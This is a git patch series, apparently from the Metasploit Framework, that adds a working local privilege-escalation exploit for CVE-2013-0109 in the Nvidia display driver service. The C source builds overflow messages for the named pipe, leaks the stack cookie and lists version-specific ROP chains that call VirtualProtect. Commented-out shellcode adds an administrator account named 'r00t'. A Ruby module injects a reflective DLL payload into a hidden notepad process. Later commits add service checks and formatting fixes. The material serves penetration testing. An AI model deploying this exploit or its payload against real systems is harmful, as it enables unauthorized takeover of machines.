buf; +} + +BYTE *BuildMalicious_OverwriteStack() +{ + static BYTE buf[0x4020] = {0}; + UINT offs = 0; + + WriteWord(0x52); + WriteWord(0); // string + + WriteDword(0); + WriteDword(0x4340); // enough to copy shellcode too + + while(BufRemaining()) + WriteDword(0x42424242); + + return buf; +} + +extern "C" int run() +{ + DWORD dwReturnCode = 1, dwBytesInOut = 0; + HANDLE hPipe = NULL; + + static BYTE rgReadBuf[GENERIC_BUF_LENGTH] = {0}; + + memset(rgReadBuf, 0, sizeof(rgReadBuf)); + + ProtocolMessage rgConvoMsg[] = { + {ProtocolAction_Connect, NULL, 0}, + {ProtocolAction_Send, BuildMalicious_LeakStack(), 0x4020}, + {ProtocolAction_Receive, {0}, 0x4200}, + {ProtocolAction_ReadCookie, {0}, 0}, + {ProtocolAction_Send, BuildMalicious_FillBuf(), 0x4020}, + {ProtocolAction_Receive, {0}, 0x4000}, + {ProtocolAction_Send, BuildMalicious_OverwriteStack(), 0x4020}, + {ProtocolAction_Receive, {0}, 0x4200}, + {ProtocolAction_Disconnect, NULL, 0}, + }; + + DWORD dwNumberOfMessages = sizeof(rgConvoMsg) / sizeof(ProtocolMessage), i = 0; + BOOL bTryAgain = FALSE; + char szPipe[256] = {0}; + + // We could renable remote hosts to target other devices on network?! + //if(stricmp(argv[1], "local") == 0) + strcpy(szPipe, "\\\\.\\pipe\\nvsr"); + //else + // sprintf(szPipe, "\\\\%s\\pipe\\nvsr", argv[1]); + + while(i < dwNumberOfMessages) + { + printf("\n\tAction %u of %u: ", i + 1, dwNumberOfMessages); + + switch(rgConvoMsg[i].Action) + { + case ProtocolAction_Connect: + printf(" - CONNECT\n"); + + hPipe = EstablishPipeConnection(szPipe); + if(!hPipe) + { + printf("!! Unable to create named pipe (GetLastError() = %u [0x%x])\n", GetLastError(), GetLastError()); + goto Cleanup; + } + + break; + case ProtocolAction_Disconnect: + printf(" - DISCONNECT\n"); + + CloseHandle(hPipe); + hPipe = NULL; + + break; + case ProtocolAction_Send: + printf(" - CLIENT => SERVER\n"); + + if(!(dwBytesInOut = WritePipe(hPipe, rgConvoMsg[i].Buf, rgConvoMsg[i].Length))) + { + printf("!! Error writing to pipe\n"); + goto Cleanup; + } + + printf("\t\tWritten %u (0x%x) characters to pipe\n", dwBytesInOut, dwBytesInOut); + + break; + case ProtocolAction_Receive: + printf("\t - SERVER => CLIENT\n"); + + if(!(dwBytesInOut = ReadPipe(hPipe, rgReadBuf, rgConvoMsg[i].Length, FALSE))) + { + printf("!! Error reading from pipe (at least, no data on pipe)\n"); + goto Cleanup; + } + + printf("\t\tRead %u (0x%x) characters from pipe\n", dwBytesInOut, dwBytesInOut); + + break; + case ProtocolAction_ReadCookie: + + // x64 Metasploit cmd/exec: + // "net user r00t r00t00r! /add & net localgroup administrators /add" + // exitfunc=thread + /*char code[] = "" + "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" + "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" + "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" + "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" + "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" + "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" + "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" + "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" + "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" + "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" + "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" + "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" + "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" + "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" + "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" + "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" + "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" + "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64" + "\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x72\x30" + "\x30\x74\x20\x72\x30\x30\x74\x30\x30\x72\x21\x20\x2f\x61\x64" + "\x64\x20\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72" + "\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74" + "\x6f\x72\x73\x20\x72\x30\x30\x74\x20\x2f\x61\x64\x64\x00";*/ + printf("Building exploit ...\n"); + unsigned __int64 uiStackCookie = *(unsigned __int64 *)(rgReadBuf + 0x4034); + printf("\t\t => Stack cookie 0&x:\n", (DWORD)(uiStackCookie >> 32), (DWORD)uiStackCookie); + + memcpy(rgConvoMsg[4].Buf + 0xc + 0xc, &uiStackCookie, 8); + + unsigned __int64 uiRetnAddress = *(unsigned __int64 *)(rgReadBuf + 0x4034 + 8), uiBase = 0, *pRopChain = NULL; + + // Perform some limited fingerprinting (my default install version, vs latest at time of testing) + switch(uiRetnAddress & 0xfff) + { + case 0x640: // nvvsvc.exe - 03 Nov 2011 - 1,640,768 bytes - md5=3947ad5d03e6abcce037801162fdb90d + { + uiBase = uiRetnAddress - 0x4640; + printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); + + pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8)); + + // Param 1: lpAddress [r11 (near rsp) into rcx] + pRopChain[0] = uiBase + 0x19e6e; // nvvsvc.exe+0x19e6e: mov rax, r11; retn + pRopChain[1] = uiBase + 0xa6d64; // nvvsvc.exe+0xa6d64: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn + pRopChain[2] = 0; // Padding + pRopChain[3] = 0; // ... + pRopChain[4] = 0; // ... + pRopChain[5] = 0; // ... + pRopChain[6] = 0; // ... + pRopChain[7] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn + pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] + pRopChain[9] = uiBase + 0xa8653; // nvvsvc.exe+0xa8653: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn + pRopChain[10] = 0; // Padding + pRopChain[11] = 0; // ... + pRopChain[12] = 0; // ... + pRopChain[13] = 0; // ... + pRopChain[14] = 0; // ... + pRopChain[15] = uiBase + 0x7772; // nvvsvc.exe+0x7772: pop r8; retn + pRopChain[16] = 0x40; // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] + pRopChain[17] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn + // Param 4: lpflOldProtect [r9 - already points at writable location] + pRopChain[18] = uiBase + 0xfe5e0; // nvvsvc.exe+0xfe5e0: IAT entry &VirtualProtect + pRopChain[19] = uiBase + 0x5d60; // nvvsvc.exe+0x5d60: mov rax, [rax]; retn + pRopChain[20] = uiBase + 0x91a85; // nvvsvc.exe+0x91a85: jmp rax + pRopChain[21] = uiBase + 0xe6251; // nvvsvc.exe+0xe6251: jmp rsp (return address from VirtualProtect) + + memcpy(pRopChain + 22, code, sizeof(code)); + } + break; + case 0x9f1: // nvvsvc.exe - 30 Aug 2012 - 891,240 bytes - md5=43f91595049de14c4b61d1e76436164f + { + uiBase = uiRetnAddress - 0x39f1; + printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); + + pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8)); + + // Param 1: lpAddress [r11 (near rsp) into rcx] + pRopChain[0] = uiBase + 0x15d36; // nvvsvc.exe+0x15d36: mov rax, r11; retn + pRopChain[1] = uiBase + 0x5493c; // nvvsvc.exe+0x5493c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn + pRopChain[2] = 0; // Padding ... + pRopChain[3] = 0; // ... + pRopChain[4] = 0; // ... + pRopChain[5] = 0; // ... + pRopChain[6] = 0; // ... + pRopChain[7] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn + pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] + pRopChain[9] = uiBase + 0x55dbf; // nvvsvc.exe+0x55dbf: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn + pRopChain[10] = 0; // Padding ... + pRopChain[11] = 0; // ... + pRopChain[12] = 0; // ... + pRopChain[13] = 0; // ... + pRopChain[14] = 0; // ... + // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] + pRopChain[15] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn + pRopChain[16] = 0x40; // PAGE_EXECUTE_READWRITE + pRopChain[17] = uiBase + 0x8b92; // nvvsvc.exe+0x55dbf: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn + pRopChain[18] = 0; // Padding ... + pRopChain[19] = 0; // ... + pRopChain[20] = 0; // ... + pRopChain[21] = 0; // ... + pRopChain[22] = 0; // ... + // Param 4: lpflOldProtect [r9 - already points at writable location] + pRopChain[23] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn + pRopChain[24] = uiBase + 0x91308; // IAT entry &VirtualProtect - 0x130 + pRopChain[25] = uiBase + 0x82989; // nvvsvc.exe+0x82989: mov rax, [rax+130h]; add rsp, 28h; retn + pRopChain[26] = 0; // Padding ... + pRopChain[27] = 0; // ... + pRopChain[28] = 0; // ... + pRopChain[29] = 0; // ... + pRopChain[30] = 0; // ... + pRopChain[31] = uiBase + 0x44ba6; // nvvsvc.exe+0x44ba6: jmp eax + pRopChain[32] = uiBase + 0x77c59; // nvvsvc.exe+0x77c59: jmp esp + + memcpy(pRopChain + 33, code, sizeof(code)); + } + break; + case 0xa11: // nvvsvc.exe - 01 Dec 2012 - 890,216 md5=3341d2c91989bc87c3c0baa97c27253b + { + uiBase = uiRetnAddress - 0x3a11; + printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); + + pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8)); + + // Param 1: lpAddress [r11 (near rsp) into rcx] + pRopChain[0] = uiBase + 0x15b52; // nvvsvc.exe+0x15b52: mov rax, r11; retn + pRopChain[1] = uiBase + 0x54d4c; // nvvsvc.exe+0x54d4c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn + pRopChain[2] = 0; // Padding ... + pRopChain[3] = 0; // ... + pRopChain[4] = 0; // ... + pRopChain[5] = 0; // ... + pRopChain[6] = 0; // ... + pRopChain[7] = uiBase + 0x8d7aa; // nvvsvc.exe+0x8d7aa: pop rdx; add al, 0; pop rbp; retn + pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] + pRopChain[9] = 0; // Padding ... + // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] + pRopChain[10] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn + pRopChain[11] = 0x40; // PAGE_EXECUTE_READWRITE + pRopChain[12] = uiBase + 0x8d26; // nvvsvc.exe+0x8d26: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn + pRopChain[13] = 0; // Padding ... + pRopChain[14] = 0; // ... + pRopChain[15] = 0; // ... + pRopChain[16] = 0; // ... + pRopChain[17] = 0; // ... + // Param 4: lpflOldProtect [r9 - already points at writable location] + pRopChain[18] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn + pRopChain[19] = uiBase + 0x91310; // IAT entry &VirtualProtect - 0x128 + pRopChain[20] = uiBase + 0x82851; // nvvsvc.exe+0x82851: mov rax, [rax+128h]; add rsp, 28h; retn + pRopChain[21] = 0; // Padding ... + pRopChain[22] = 0; // ... + pRopChain[23] = 0; // ... + pRopChain[24] = 0; // ... + pRopChain[25] = 0; // ... + pRopChain[26] = uiBase + 0x44fb6; // nvvsvc.exe+0x44fb6: jmp rax + pRopChain[27] = uiBase + 0x8a0dc; // nvvsvc.exe+0x8a0dc: push rsp; retn + + memcpy(pRopChain + 28, code, sizeof(code)); + } + break; + } + + break; + } + + i++; + } + + dwReturnCode = 0; +Cleanup: + if(hPipe) + CloseHandle(hPipe); + + return dwReturnCode; +} \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/rdi.sln b/external/source/exploits/cve-2013-0109/rdi.sln new file mode 100644 index 0000000000..b490cb423d --- /dev/null +++ b/external/source/exploits/cve-2013-0109/rdi.sln @@ -0,0 +1,32 @@ + +Microsoft Visual Studio Solution File, Format Version 11.00 +# Visual C++ Express 2010 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|ARM = Debug|ARM + Debug|Win32 = Debug|Win32 + Debug|x64 = Debug|x64 + Release|ARM = Release|ARM + Release|Win32 = Release|Win32 + Release|x64 = Release|x64 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.ActiveCfg = Release|ARM + {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.Build.0 = Release|ARM + {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32 + {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32 + {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64 + {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64 + {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.ActiveCfg = Release|ARM + {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.Build.0 = Release|ARM + {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32 + {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32 + {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64 + {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/modules/exploits/windows/local/nvidia_nvvsvc.rb b/modules/exploits/windows/local/nvidia_nvvsvc.rb new file mode 100644 index 0000000000..e3a68d108e --- /dev/null +++ b/modules/exploits/windows/local/nvidia_nvvsvc.rb @@ -0,0 +1,115 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/windows/priv' +require 'msf/core/post/windows/process' + +class Metasploit3 < Msf::Exploit::Local + Rank = AverageRanking + + include Msf::Post::File + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Process + include Msf::Post::Windows::Services + + def initialize(info={}) + super(update_info(info, { + 'Name' => 'Nvidia Display Driver Service Local Privilege Escalation', + 'Description' => %q{ + TODO + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Peter Wintersmith', # Original exploit + 'Ben Campbell ', # Metasploit integration + ], + 'Arch' => ARCH_X86_64, + 'Platform' => 'win', + 'SessionTypes' => [ 'meterpreter' ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Targets' => + [ + [ 'Automatic', { } ] + ], + 'Payload' => + { + 'Space' => 2048, + 'DisableNops' => true + }, + 'References' => + [ + [ 'CVE', '2013-0109' ], + [ 'OSVDB', '88745' ], + [ 'URL', 'http://nvidia.custhelp.com/app/answers/detail/a_id/3288' ], + ], + 'DisclosureDate' => 'Dec 25 2012', + 'DefaultTarget' => 0 + })) + + end + + def check + os = sysinfo["OS"] + if os =~ /windows/i + return Exploit::CheckCode::Vulnerable + end + + # TODO: Check for service + end + + def create_proc() + windir = expand_path("%windir%") + cmd = "#{windir}\\system32\\notepad.exe" + return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid + end + + def exploit + dll = '' + offset = nil + file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll") + File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) } + + pay = payload.encoded + + bo = dll.index('PAYLOAD:') + raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo + dll[bo, pay.length] = [pay].pack("a*") + + pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) + + pe.exports.entries.each do |entry| + if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) + offset = pe.rva_to_file_offset( entry.rva ) + break + end + end + + print_error("No offset found") unless offset + + new_pid = create_proc + + if not new_pid + fail_with(Exploit::Failure::Unknown, "Failed to create a new process") + end + + vprint_status("Injecting payload into memory") + host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS) + mem = host_process.memory.allocate(dll.length + (dll.length % 1024)) + host_process.memory.protect(mem) + host_process.memory.write(mem, dll) + host_process.thread.create(mem+offset) + end + + +end From a930056d7f7e8ae3b92f4bdb69eb818a0b891dc0 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 5 Jul 2013 22:25:04 +0100 Subject: [PATCH 035/205] Added service status checks to Post::Windows::Services Added QueryServiceStatus to Railgun Advapi32 Definitions Added Checks to module Conflicts: lib/msf/core/post/windows/services.rb lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb --- lib/msf/core/post/windows/services.rb | 44 ++++++++++ .../stdapi/railgun/def/def_advapi32.rb | 6 +- .../exploits/windows/local/nvidia_nvvsvc.rb | 87 +++++++++++++++++-- 3 files changed, 127 insertions(+), 10 deletions(-) diff --git a/lib/msf/core/post/windows/services.rb b/lib/msf/core/post/windows/services.rb index b517358a15..786487b353 100644 --- a/lib/msf/core/post/windows/services.rb +++ b/lib/msf/core/post/windows/services.rb @@ -306,6 +306,50 @@ module Services handle["GetLastError"] end end + + # + # Query Service Status + # + # @param (see #service_start) + # + # @return {} representing lpServiceStatus + # + # @raise (see #service_start) + # + # + def service_status(name, server=nil) + adv = session.railgun.advapi32 + ret = nil + + # 0x80000000 GENERIC_READ + open_sc_manager(:host => server, :access => 0x80000000) do |manager| + # Now to grab a handle to the service. + handle = adv.OpenServiceA(manager, name, 0x80000000) + if (handle["return"] == 0) + raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}") + end + + status = adv.QueryServiceStatus(handle["return"],28) + if (status["return"] == 0) + raise RuntimeError.new("Could not query service. QueryServiceStatus error: #{handle["GetLastError"]}") + end + + vals = status['lpServiceStatus'].unpack('L*') + adv.CloseServiceHandle(handle["return"]) + + ret = { + :type => vals[0], + :state => vals[1], + :controls_accepted => vals[2], + :win32_exit_code => vals[3], + :service_exit_code => vals[4], + :check_point => vals[5], + :wait_hint => vals[6] + } + end + + return ret + end end end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb index 7db494335b..001daad768 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb @@ -27,6 +27,10 @@ class Def_advapi32 def self.create_dll(dll_path = 'advapi32') dll = DLL.new(dll_path, ApiConstants.manager) + dll.add_function('QueryServiceStatus', 'DWORD', [ + ['LPVOID', 'hService', 'in'], + ['BLOB', 'lpServiceStatus', 'out']) + dll.add_function('CredEnumerateA', 'BOOL', [ ['PCHAR', 'Filter', 'in'], ['DWORD', 'Flags', 'in'], @@ -2089,10 +2093,8 @@ class Def_advapi32 ["PBLOB","pvContext","in"], ]) - return dll end - end end; end; end; end; end; end; end diff --git a/modules/exploits/windows/local/nvidia_nvvsvc.rb b/modules/exploits/windows/local/nvidia_nvvsvc.rb index e3a68d108e..a29465135d 100644 --- a/modules/exploits/windows/local/nvidia_nvvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvvsvc.rb @@ -10,6 +10,7 @@ require 'rex' require 'msf/core/post/common' require 'msf/core/post/windows/priv' require 'msf/core/post/windows/process' +require 'msf/core/post/windows/services' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking @@ -21,9 +22,14 @@ class Metasploit3 < Msf::Exploit::Local def initialize(info={}) super(update_info(info, { - 'Name' => 'Nvidia Display Driver Service Local Privilege Escalation', + 'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation', 'Description' => %q{ - TODO + The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user can + interact with the service. The service has a stacked based buffer overflow as a result + of a memmove operation. + + This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012. + It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012. }, 'License' => MSF_LICENSE, 'Author' => @@ -60,21 +66,86 @@ class Metasploit3 < Msf::Exploit::Local end def check + vuln_hashes = [ '43f91595049de14c4b61d1e76436164f', + '3947ad5d03e6abcce037801162fdb90d', + '3341d2c91989bc87c3c0baa97c27253b' ] + os = sysinfo["OS"] if os =~ /windows/i - return Exploit::CheckCode::Vulnerable + svc = service_info 'nvsvc' + if svc and svc['Name'] =~ /NVIDIA/i + vprint_good("Found service '#{svc['Name']}'") + + begin + unless is_running? + print_error("Service is not running!") + else + print_good("Service is running") + end + rescue RuntimeError => e + print_error("Unable to retrieve service status") + end + + if sysinfo['Architecture'] =~ /WOW64/i + # Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!) + return Exploit::CheckCode::Detected + else + path = svc['Command'].strip + end + + begin + hash = client.fs.file.md5(path).unpack('H*').first + rescue Rex::Post::Meterpreter::RequestError => e + print_error("Error checking file hash: #{e}") + return Exploit::CheckCode::Detected + end + + if vuln_hashes.include?(hash) + vprint_good("Hash '#{hash}' is listed as vulnerable") + return Exploit::CheckCode::Vulnerable + else + vprint_status("Hash '#{hash}' is not recorded as vulnerable") + return Exploit::CheckCode::Detected + end + else + return Exploit::CheckCode::Safe + end end - - # TODO: Check for service end - def create_proc() + def create_proc windir = expand_path("%windir%") cmd = "#{windir}\\system32\\notepad.exe" return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid end + + def is_running? + begin + status = service_status('nvsvc') + return (status and status[:state] == 4) + rescue RuntimeError => e + print_error("Unable to retrieve service status") + return false + end + + end def exploit + unless is_running? + print_error("Service not running - attempting to start") + res = service_start('nvsvc') + case res + when 0 + print_good("Service started") + when 1 + print_status("Service already started") + else + fail_with(Exploit::Failure::Unknown, "Unable to start service") + end + else + print_good("Service is running") + end + dll = '' offset = nil file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll") @@ -108,8 +179,8 @@ class Metasploit3 < Msf::Exploit::Local mem = host_process.memory.allocate(dll.length + (dll.length % 1024)) host_process.memory.protect(mem) host_process.memory.write(mem, dll) + print_status("Executing exploit...") host_process.thread.create(mem+offset) end - - end + From 5eca4714c239651f19e9ceb323cca9e9c709719f Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 5 Jul 2013 22:32:15 +0100 Subject: [PATCH 036/205] Renamed module --- .../windows/local/{nvidia_nvvsvc.rb => nvidia_nvsvc.rb} | 2 ++ 1 file changed, 2 insertions(+) rename modules/exploits/windows/local/{nvidia_nvvsvc.rb => nvidia_nvsvc.rb} (98%) diff --git a/modules/exploits/windows/local/nvidia_nvvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb similarity index 98% rename from modules/exploits/windows/local/nvidia_nvvsvc.rb rename to modules/exploits/windows/local/nvidia_nvsvc.rb index a29465135d..f9a5121c8a 100644 --- a/modules/exploits/windows/local/nvidia_nvvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -27,6 +27,8 @@ class Metasploit3 < Msf::Exploit::Local The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user can interact with the service. The service has a stacked based buffer overflow as a result of a memmove operation. + + N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr! This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012. It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012. From 819ba30a3331896409a2e482a9476611b6df5cde Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 5 Jul 2013 22:35:22 +0100 Subject: [PATCH 037/205] msftidy Conflicts: lib/msf/core/post/windows/services.rb --- lib/msf/core/post/windows/services.rb | 4 +- .../exploits/windows/local/nvidia_nvsvc.rb | 102 +++++++++--------- 2 files changed, 53 insertions(+), 53 deletions(-) diff --git a/lib/msf/core/post/windows/services.rb b/lib/msf/core/post/windows/services.rb index 786487b353..2893e9b640 100644 --- a/lib/msf/core/post/windows/services.rb +++ b/lib/msf/core/post/windows/services.rb @@ -292,7 +292,7 @@ module Services # Now to grab a handle to the service. # Thank you, Wine project for defining the DELETE constant since it, # and all its friends, are missing from the MSDN docs. - # #define DELETE 0x00010000 + # #define DELETE 0x00010000 handle = adv.OpenServiceA(manager, name, 0x10000) if (handle["return"] == 0) raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}") @@ -312,7 +312,7 @@ module Services # # @param (see #service_start) # - # @return {} representing lpServiceStatus + # @return {} representing lpServiceStatus # # @raise (see #service_start) # diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index f9a5121c8a..eef3e92e05 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -22,40 +22,40 @@ class Metasploit3 < Msf::Exploit::Local def initialize(info={}) super(update_info(info, { - 'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation', - 'Description' => %q{ + 'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation', + 'Description' => %q{ The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user can interact with the service. The service has a stacked based buffer overflow as a result of a memmove operation. - + N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr! This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012. It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ 'Peter Wintersmith', # Original exploit 'Ben Campbell ', # Metasploit integration ], - 'Arch' => ARCH_X86_64, - 'Platform' => 'win', - 'SessionTypes' => [ 'meterpreter' ], + 'Arch' => ARCH_X86_64, + 'Platform' => 'win', + 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, - 'Targets' => + 'Targets' => [ [ 'Automatic', { } ] ], - 'Payload' => + 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, - 'References' => + 'References' => [ [ 'CVE', '2013-0109' ], [ 'OSVDB', '88745' ], @@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Local rescue RuntimeError => e print_error("Unable to retrieve service status") end - + if sysinfo['Architecture'] =~ /WOW64/i # Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!) return Exploit::CheckCode::Detected else path = svc['Command'].strip end - + begin hash = client.fs.file.md5(path).unpack('H*').first rescue Rex::Post::Meterpreter::RequestError => e @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Local if vuln_hashes.include?(hash) vprint_good("Hash '#{hash}' is listed as vulnerable") return Exploit::CheckCode::Vulnerable - else + else vprint_status("Hash '#{hash}' is not recorded as vulnerable") return Exploit::CheckCode::Detected end @@ -115,20 +115,20 @@ class Metasploit3 < Msf::Exploit::Local end end - def create_proc - windir = expand_path("%windir%") - cmd = "#{windir}\\system32\\notepad.exe" - return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid - end - + def create_proc + windir = expand_path("%windir%") + cmd = "#{windir}\\system32\\notepad.exe" + return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid + end + def is_running? - begin - status = service_status('nvsvc') + begin + status = service_status('nvsvc') return (status and status[:state] == 4) - rescue RuntimeError => e - print_error("Unable to retrieve service status") + rescue RuntimeError => e + print_error("Unable to retrieve service status") return false - end + end end @@ -147,40 +147,40 @@ class Metasploit3 < Msf::Exploit::Local else print_good("Service is running") end - - dll = '' - offset = nil - file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll") - File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) 